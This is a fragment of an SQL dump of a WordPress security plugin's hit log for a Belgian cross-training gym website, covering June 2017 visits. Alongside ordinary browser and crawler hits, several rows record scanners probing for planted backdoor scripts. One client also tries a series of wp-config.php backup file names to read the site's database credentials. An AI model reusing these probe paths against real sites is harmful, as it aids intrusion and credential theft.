(75311, 1497544609.785701, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75312, 1497544610.220426, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75313, 1497544610.714077, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75314, 1497548734.596000, 1123633613, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75315, 1497551180.864392, 2680892047, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '213.186.33.3', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'),
(75316, 1497551190.365031, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75317, 1497551191.005406, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75318, 1497551191.474502, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75319, 1497551191.914352, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75320, 1497551192.359823, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75321, 1497551192.807030, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75322, 1497551193.374974, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75323, 1497551193.886241, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75324, 1497551194.394398, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75325, 1497551194.911783, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75326, 1497551195.424259, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75327, 1497552929.901312, 1123633421, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75328, 1497552931.453523, 1123633540, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75329, 1497560347.080911, 1538615370, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'android-app://com.google.android.googlequicksearchbox/https/www.google.com', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75330, 1497560348.466219, 1538615370, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75331, 1497561351.177212, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75332, 1497561377.169982, 1467349730, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/paypal-donation-button/paypal-donation-button.php', 'http://crosstrainingcenter.be/wp-content/plugins/paypal-donation-button/paypal-donation-button.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75333, 1497563552.032076, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75334, 1497565704.653961, 1426773780, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/network/etc.php', 'http://crosstrainingcenter.be/wp-admin/network/etc.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75335, 1497566255.214847, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75336, 1497567355.394323, 3024883483, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75337, 1497569723.131102, 1815808070, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(75338, 1497569726.125464, 1815808070, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(75339, 1497569728.041447, 1815808070, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(75340, 1497571731.723492, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75341, 1497573544.498907, 1123633540, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75342, 1497574151.374330, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75343, 1497576891.470406, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75344, 1497578761.751214, 1123633540, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75345, 1497581790.769487, 3107604753, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp_module-1/wp_msg.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp_module-1/wp_msg.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75346, 1497581999.950341, 757167658, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db-update.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db-update.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75347, 1497582174.092396, 88944456, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/customizer.php', 'http://crosstrainingcenter.be/customizer.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75348, 1497587440.624571, 1844203978, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75349, 1497587441.461266, 1844203978, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75350, 1497587442.382672, 1844203978, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75351, 1497587443.020963, 1844203978, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75352, 1497587443.755775, 1844203978, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75353, 1497587581.305574, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75354, 1497589774.176630, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75355, 1497590294.305797, 1347353146, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/paypal-donation-button/db.php', 'http://crosstrainingcenter.be/wp-content/plugins/paypal-donation-button/db.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(75356, 1497590333.031383, 1138992850, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_info.class.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_info.class.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75357, 1497590613.348641, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75358, 1497591278.180063, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75359, 1497591954.765547, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75360, 1497592612.259594, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75361, 1497593240.903428, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75362, 1497593806.515603, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75363, 1497594473.733574, 1123633540, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75364, 1497594586.704815, 3254831113, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/ajax-requests.new.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/ajax-requests.new.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75365, 1497595080.205759, 1123633540, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75366, 1497598922.706765, 1474632318, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/user-info.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/user-info.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75367, 1497603434.908840, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_model.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_model.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75368, 1497604222.883956, 1370060441, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75369, 1497604223.756726, 1370060441, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75370, 1497604224.461509, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75371, 1497604226.580534, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75372, 1497604227.098039, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75373, 1497604227.769484, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75374, 1497604228.353285, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75375, 1497604228.823575, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75376, 1497604229.329704, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75377, 1497604229.949127, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75378, 1497604230.453938, 1370060441, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75379, 1497604512.699292, 1073352502, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(75380, 1497609315.786181, 2342691993, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/images/media/rss.php', 'http://crosstrainingcenter.be/wp-includes/images/media/rss.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75381, 1497612213.946300, 84519249, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/slide-menues.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/slide-menues.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75382, 1497615741.963427, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75383, 1497615742.451781, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75384, 1497616083.012804, 1123633540, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75385, 1497622421.133831, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75386, 1497622733.269793, 3475901900, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75387, 1497627883.758373, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75388, 1497627885.524825, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75389, 1497627885.632430, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(75390, 1497627886.158394, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(75391, 1497627887.782488, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75392, 1497627891.205327, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75393, 1497628938.269326, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75394, 1497628939.057810, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75395, 1497628939.553805, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75396, 1497628939.978262, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75397, 1497628940.455990, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75398, 1497628941.014768, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75399, 1497628941.568499, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75400, 1497628942.099512, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75401, 1497628942.606791, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75402, 1497628943.115292, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75403, 1497628943.637133, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75404, 1497630584.362559, 876568582, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/sidebar-widescreen.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/sidebar-widescreen.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75405, 1497631117.183101, 3000613671, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-config.php~', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75406, 1497631119.909980, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config-backup1.txt', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75407, 1497631131.923640, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config.bak', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75408, 1497631134.006139, 3000613671, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-config.phpOLD', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75409, 1497631141.915718, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config.txt', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75410, 1497631144.470734, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config.phpa', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75411, 1497631147.401497, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config.old', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75412, 1497631154.217176, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config.php.txt', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75413, 1497631178.110128, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config.', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75414, 1497631180.983729, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-config-backup.txt', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75415, 1497631200.808006, 3000613671, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/config.bak', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75416, 1497631223.962009, 3000613671, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/config.php~', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B142 Safari/8536.25'),
(75417, 1497632784.317266, 2637637594, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75418, 1497632784.962496, 2637637594, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75419, 1497633810.324925, 2637637527, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75420, 1497638426.325473, 599388095, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0'),
(75421, 1497639841.409786, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75422, 1497639970.407651, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75423, 1497642987.696083, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentythirteen/system.php', 'http://crosstrainingcenter.be/wp-content/themes/twentythirteen/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
